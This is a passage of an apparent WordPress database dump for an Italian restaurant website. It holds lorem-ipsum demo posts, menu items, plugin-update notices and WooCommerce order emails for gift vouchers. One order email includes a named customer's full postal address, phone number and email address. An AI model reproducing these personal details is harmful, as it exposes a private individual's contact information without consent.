nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Taste Cold Fruit','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','taste-cold-fruit','','','2018-09-17 07:45:46','2018-09-17 07:45:46','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2901',0,'portfolio-item','',0),(2902,1,'2018-09-17 07:46:19','2018-09-17 07:46:19','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.[/vc_column_text][/vc_column][/vc_row]','Delicious Vitamin Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','delicious-vitamin-salad','','','2018-09-17 07:46:19','2018-09-17 07:46:19','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2902',0,'portfolio-item','',0),(3763,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Layouts','','publish','closed','closed','','layouts-5','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/layouts-5/',54,'nav_menu_item','',0),(3764,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Slider','','publish','closed','closed','','slider-5','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/slider-5/',49,'nav_menu_item','',0),(3765,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Portfolio','','publish','closed','closed','','portfolio-12','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/portfolio-12/',20,'nav_menu_item','',0),(3766,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Layouts','','publish','closed','closed','','layouts-6','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/layouts-6/',31,'nav_menu_item','',0),(3767,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Slider','','publish','closed','closed','','slider-6','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/slider-6/',26,'nav_menu_item','',0),(2898,1,'2018-09-17 07:45:58','2018-09-17 07:45:58','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Vegetables','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','vegetables','','','2018-09-17 07:45:58','2018-09-17 07:45:58','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2898',0,'portfolio-item','',0),(3722,1,'2021-01-20 18:24:31','2021-01-20 17:24:31','','Home','','publish','closed','closed','','home-9','','','2021-01-20 18:24:31','2021-01-20 17:24:31','',0,'https://www.ristorantesolymar.it/2021/01/20/home-9/',1,'nav_menu_item','',0),(3723,1,'2021-01-20 18:24:31','2021-01-20 17:24:31','','Pages','','publish','closed','closed','','pages-9','','','2021-01-20 18:24:31','2021-01-20 17:24:31','',0,'https://www.ristorantesolymar.it/2021/01/20/pages-9/',11,'nav_menu_item','',0),(3724,1,'2021-01-20 18:24:31','2021-01-20 17:24:31','','Blog','','publish','closed','closed','','blog-9','','','2021-01-20 18:24:31','2021-01-20 17:24:31','',0,'https://www.ristorantesolymar.it/2021/01/20/blog-9/',22,'nav_menu_item','',0),(3725,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Shop','','publish','closed','closed','','shop-9','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/shop-9/',33,'nav_menu_item','',0),(3721,1,'2021-01-20 18:19:09','2021-01-20 17:19:09','{{unknown}}','','','publish','closed','closed','','cbd5684129d5f02babc64d37a353d5f8','','','2021-01-20 18:19:09','2021-01-20 17:19:09','',0,'https://www.ristorantesolymar.it/2021/01/20/cbd5684129d5f02babc64d37a353d5f8/',0,'oembed_cache','',0),(3726,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Portfolio','','publish','closed','closed','','portfolio-9','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/portfolio-9/',45,'nav_menu_item','',0),(3727,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Elements','','publish','closed','closed','','elements-5','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/elements-5/',68,'nav_menu_item','',0),(3728,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Home','','publish','closed','closed','','home-10','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/home-10/',1,'nav_menu_item','',0),(3729,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Pages','','publish','closed','closed','','pages-10','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/pages-10/',11,'nav_menu_item','',0),(3715,0,'2021-01-17 01:39:01','2021-01-17 00:39:01','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.16 to 2.0.18)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-31','','','2021-01-17 01:39:01','2021-01-17 00:39:01','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-31/',0,'postman_sent_mail','',0),(3716,0,'2021-01-18 13:24:14','2021-01-18 12:24:14','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (from version 2.3.15 to 2.3.16)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-32','','','2021-01-18 13:24:14','2021-01-18 12:24:14','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-32/',0,'postman_sent_mail','',0),(4596,0,'2021-01-26 01:54:45','2021-01-26 00:54:45','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder','','','2021-01-26 01:54:45','2021-01-26 00:54:45','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2021/01/woocommerce-placeholder.png',0,'attachment','image/png',0),(3714,0,'2021-01-17 01:39:01','2021-01-17 00:39:01','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.16 to 2.0.18)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-30','','','2021-01-17 01:39:01','2021-01-17 00:39:01','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-30/',0,'postman_sent_mail','',0),(3672,0,'2020-12-17 13:29:48','2020-12-17 12:29:48','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Contact Form 7 (from version 5.3.1 to 5.3.2)\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from version 3.1.0 to 3.1.1)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-13','','','2020-12-17 13:29:48','2020-12-17 12:29:48','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-13/',0,'postman_sent_mail','',0),(3673,0,'2020-12-18 01:23:12','2020-12-18 00:23:12','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Direct Checkout for WooCommerce (from version 2.4.2 to 2.4.3)\n- UpdraftPlus - Backup/Restore (from version 1.16.42 to 1.16.43)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-14','','','2020-12-18 01:23:12','2020-12-18 00:23:12','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-14/',0,'postman_sent_mail','',0),(3674,0,'2020-12-18 13:26:56','2020-12-18 12:26:56','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (from version 2.3.14 to 2.3.15)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-15','','','2020-12-18 13:26:56','2020-12-18 12:26:56','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-15/',0,'postman_sent_mail','',0),(3692,0,'2020-12-31 16:44:28','2020-12-31 15:44:28','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi jdydpehffrf,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>jdydpehffrf</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','Incorrect authentication data\r\n','private','closed','closed','','your-sol-y-mar-account-has-been-created','','','2020-12-31 16:44:28','2020-12-31 15:44:28','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created/',0,'postman_sent_mail','',0),(3676,1,'2020-12-19 08:51:32','2020-12-19 07:51:32',' ','','','publish','closed','closed','','3676','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',0,'https://www.ristorantesolymar.it/?p=3676',3,'nav_menu_item','',0),(3677,1,'2020-12-23 13:25:06','2020-12-23 12:25:06','','Order &ndash; December 23, 2020 @ 01:25 PM','','wc-cancelled','open','closed','wc_order_ytAfBeD8qnlB9','order-dec-23-2020-1225-pm','','','2020-12-23 14:17:24','2020-12-23 13:17:24','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=3677',0,'shop_order','',1),(3678,1,'2020-12-23 18:25:15','2020-12-23 17:25:15','','Order &ndash; December 23, 2020 @ 06:25 PM','','wc-cancelled','open','closed','wc_order_6nDcnrxfr7tEJ','order-dec-23-2020-0525-pm','','','2020-12-23 19:18:35','2020-12-23 18:18:35','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=3678',0,'shop_order','',1),(3679,1,'2020-12-24 12:25:41','2020-12-24 11:25:41','','Order &ndash; December 24, 2020 @ 12:25 PM','','wc-processing','open','closed','wc_order_5fDQe2sHtFsh5','order-dec-24-2020-1125-am','','','2020-12-24 12:26:57','2020-12-24 11:26:57','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=3679',0,'shop_order','',2),(3680,0,'2020-12-24 12:27:00','2020-12-24 11:27:00','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">You’ve received the following order from Matteo Sandri:</p>\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=3679&amp;action=edit\" style=\"font-weight: normal;text-decoration: underline;color: #557da1\">[Order #3679]</a> (24 December 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Laura Lucchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Tom e Edo</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Buon Natale 2020</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n	<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Laura e Matteo</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Tom e Edo</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Buon Natale parents!!!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">200,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">200,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Matteo Sandri<br>Via Saragozza 157 Bologna<br>40135<br>Bologna<br>BOLOGNA									<br><a href=\"tel:3408565027\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3408565027</a>													<br>matteo.sandri@bahlsen.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','[Sol Y Mar] Prenotazione da nuovo cliente (3679) - 24 December 2020','','private','closed','closed','','sol-y-mar-prenotazione-da-nuovo-cliente-3679-24-december-2020','','','2020-12-24 12:27:00','2020-12-24 11:27:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-prenotazione-da-nuovo-cliente-3679-24-december-2020/',0,'postman_sent_mail','',0),(3681,0,'2020-12-24 12:27:04','2020-12-24 11:27:04','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi Matteo,</p>\n<p style=\"margin: 0 0 16px\">Just to let you know — we\'ve received your order #3679, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	[Order #3679] (24 December 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			